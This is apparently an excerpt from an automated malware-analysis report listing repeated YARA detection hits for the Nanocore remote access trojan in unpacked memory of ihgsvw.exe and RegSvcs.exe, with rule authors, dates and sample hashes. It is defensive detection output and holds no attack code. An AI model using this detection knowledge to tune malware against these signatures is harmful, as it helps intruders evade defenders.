      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
